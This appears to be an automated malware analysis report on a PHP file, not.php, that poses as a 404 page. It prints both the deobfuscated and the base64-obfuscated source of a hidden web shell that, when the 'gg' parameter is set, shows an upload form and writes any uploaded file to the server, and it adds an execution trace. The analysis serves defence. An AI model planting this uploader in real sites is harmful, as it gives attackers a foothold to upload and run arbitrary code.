PHP Malware Analysis

not.php

md5: 67fba432111710dc8fe5ba601c4ff5de

Jump to:

Screenshot


Attributes

Encoding

Files

Input

Title


Deobfuscated PHP code

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php 
echo $_SERVER['REQUEST_URI'];
?> was not found on this server.</p>
</body></html>
<?php 
if (isset($_GET["gg"])) {
    echo "\"<form method='POST' enctype='multipart/form-data'><input type='file'name='f' /><input type='submit' value='up' /></form>\"";
    @copy($_FILES['f']['tmp_name'], $_FILES['f']['name']);
    echo "<a href=" . $_FILES['f']['name'] . ">" . $_FILES['f']['name'] . "</a>";
}

Execution traces

data/traces/67fba432111710dc8fe5ba601c4ff5de_trace-1676261640.5418.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:14:26.439581]
1	0	1	0.000163	393512
1	3	0	0.000231	396600	{main}	1		/var/www/html/uploads/not.php	0	0
1	3	1	0.000250	396600
			0.000281	314224
TRACE END   [2023-02-13 02:14:26.439742]


Generated HTML code

<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /not.php was not found on this server.</p>

</body></html>

Original PHP code

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL <?php echo $_SERVER['REQUEST_URI'];
 ?> was not found on this server.</p>
</body></html>
<?php
if(isset($_GET["gg"])){
 echo(base64_decode("Ijxmb3"."JtIG1ldGhvZD0n"."UE9TVCcgZW5jdHlw"."ZT0nbXVsdGlwYXJ0L2Z"."vcm0tZGF0YSc+PGl"."ucHV0IHR5cGU9J2ZpbGUnbmF"."tZT0nZicgLz48aW5wdXQgdHlwZT0nc3V"."ibWl0JyB2YWx1ZT0ndXAnIC8+PC9mb3JtPiI="));
 @copy($_FILES['f']['tmp_name'],$_FILES['f']['name']);
 echo("<a href=".$_FILES['f']['name'].">".$_FILES['f']['name']."</a>");
}
?>